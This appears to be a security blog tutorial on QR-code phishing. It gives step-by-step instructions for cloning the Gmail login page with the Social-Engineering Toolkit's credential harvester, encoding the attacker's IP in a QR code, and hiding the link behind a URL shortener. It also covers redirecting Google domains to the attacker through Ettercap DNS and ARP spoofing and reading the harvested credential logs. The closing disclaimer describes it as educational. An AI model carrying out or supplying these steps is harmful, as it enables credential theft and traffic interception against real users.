QR code is a structured code in an image that can be read by specific readers that reveal their content or perform redirect functions for pages and so on. This tool, which was created especially for parts catalog and inventory management, is now used in various posters, business cards, banners, manuals, flayers and etc, and because of its popularization, it is also easy to be circumvented to give advantages To attackers and trolls in order to take some advantage of the personnel since this reading and interpretation is already found on phones, tablets and other personal gadgets. In this text I will approach this attack vector showing possible ways to exploit, either by phishing sending the request to a specific server or by performing DNS Spoof and ARP Poisoning with other tools.
We will perform the attack using the setoolkit (Social Engineering Toolkit). A very powerful social engineering attack framework that we will use to clone websites and place the same inside an NFC tag and within a QR Code.
First let’s open Seetoolkit and perform a simple GMAIL clone for our localhost
Select in order
1) Social-Engineering Attacks 2) Website Attack Vectors 3) Credential Harvester Attack Method 2) Site Cloner
Enter the IP of the attacking machine: ex: 192.168.1.56
Enter the URL to be cloned ex: ‘https://accounts.google.com
If you have followed all the settings we have in this Post, the entire site will be cloned into the / var / www / html /
Try to access it by localhost through the browser
Creating the QR Code
Now let’s put the URL of our server inside the QR Code
There are several methods of generating QR Codes, including online tools. You can choose what you prefer, we even have a function of that within setoolkit. However, I decided to opt for a simpler alternative to this post, qrencode.
# sudo apt-get install qrencode # qrencode 'http://192.168.1.56' -o qr_atack.png
If you are in environments where you do not have direct access to the network, and did not want to leave so face-off the attack, you can make use of link shortcuts as bit.ly to point to the IP of your fake Web server. However, we can further fine-tune this technique with the Ettercap ARP Poisoning function if we are in the same attack network to poison the DNS and ARP table of the router and victim, making it appear authentically that we are really the chosen server.
Performing Spoofing DNS from the target page
It is also possible to perform DNS and ARP spoofing of the cloned site using a Man in the Middle technique with Ettercap to ‘fool’ the gateway and the victim, making them think that you are the requested server, even appearing the true url Of the site during the attack.
This process was covered in more detail in this post, but I will give a basic application in it here. If you are interested in going deeper into exploring this feature, feel free to do so. 🙂
Let’s edit the Ettercap DNS configuration file and add the following lines at the end of the file, changing only your IP.
# vim /etc/ettercap/etter.dns
#GMAIL SPOOFING gmail.com A 192.168.1.56 https://accounts.google.com/ A 192.168.1.56 * *.gmail.com A 192.168.1.56 accounts.google.com/ A 192.168.1.56 mail.google.com A 192.168.1.56 ~
Now let’s open Ettercap and parameterize the same to continue the attack:
On the Sniff tab select the “Unified Sniff”
In the Host tab, select the “Scan for hosts” option or give Ctrl + S to search the hosts on your network.
Again in the “hosts” tab select the “Host List”
Select the IP of the Gateway and the IP that you want to sniff and click on “Add to Target 2”
If you are attacking a network with Switches, open a terminal, and as root type:
You can capture Setookit posts within the apache directory, with the harvester logs. They are organizer by date and time, as you can see as you progress through the tests.
# cat /var/www/html/harvester_2016-01-07\ 23\:46\:29.762995.txt
Remembering that this article has educational purpose for professionals and students of Information Security. We are not responsible for the misuse of the techniques learned here.
The upcoming posts will address this exploit in NFC Tags and Google Beacons to show more recent vectors of this material.